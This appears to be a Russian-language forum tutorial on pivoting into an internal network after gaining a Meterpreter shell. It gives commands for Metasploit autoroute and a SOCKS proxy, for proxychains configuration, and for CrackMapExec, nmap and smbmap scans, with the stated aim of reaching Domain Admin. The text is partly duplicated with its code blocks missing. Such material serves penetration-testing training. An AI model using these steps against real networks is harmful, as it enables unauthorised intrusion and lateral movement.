devqp
Специалист
Принцип работы
Техника пивитинга позволяет расширить доступ во внутреннюю сеть после получения первоначального Meterpreter-шелла. Комбинация CrackMapExec, Meterpreter и Proxychains обеспечивает инструментарий для перечисления и атаки защищенных сегментов.
Необходимые компоненты
• Meterpreter shell: Установка через Metasploit Framework (
)
• Proxychains-ng:
(
)
• CrackMapExec: Требует предварительной настройки зависимостей
Установка CrackMapExec
Настройка Meterpreter для маршрутизации
Конфигурация Proxychains
Редактирование /etc/proxychains.conf:
Эксплуатация внутренней сети
Примеры команд через proxychains:
Результат
Успешный пивитинг позволяет последовательно атаковать глубинную сеть, включая получение прав Domain Admin через компрометацию дополнительных систем.
Техника пивитинга позволяет расширить доступ во внутреннюю сеть после получения первоначального Meterpreter-шелла. Комбинация CrackMapExec, Meterpreter и Proxychains обеспечивает инструментарий для перечисления и атаки защищенных сегментов.
Необходимые компоненты
• Meterpreter shell: Установка через Metasploit Framework (
Код:
https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
• Proxychains-ng:
Код:
sudo apt install proxychains
Код:
https://github.com/rofl0r/proxychains-ng
• CrackMapExec: Требует предварительной настройки зависимостей
Установка CrackMapExec
Код:
sudo apt-get update
sudo apt-get install -y libssl-dev libkrb5-dev libffi-dev python-dev build-essential
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
reset
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry shell
crackmapexec --help # Проверка установки
Настройка Meterpreter для маршрутизации
Код:
bg # Фоновый режим текущей сессии
use post/multi/manage/autoroute
set SESSION <id_сессии>
set SUBNET <целевая_подсеть> # Пример: 192.168.133.0
set NETMASK /24 # Опционально
run
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1
set SRVPORT 1080
run # Запуск SOCKS5-прокси
Конфигурация Proxychains
Редактирование /etc/proxychains.conf:
Код:
socks5 127.0.0.1 1080 # Добавить в конец файла
# Закомментировать другие прокси (socks4 и т.д.)
Эксплуатация внутренней сети
Примеры команд через proxychains:
Код:
proxychains crackmapexec smb 192.168.133.0/24
proxychains nmap -n -sT -sV -O -PN -p- 192.168.133.7
proxychains smbmap -H 192.168.133.10
Результат
Успешный пивитинг позволяет последовательно атаковать глубинную сеть, включая получение прав Domain Admin через компрометацию дополнительных систем.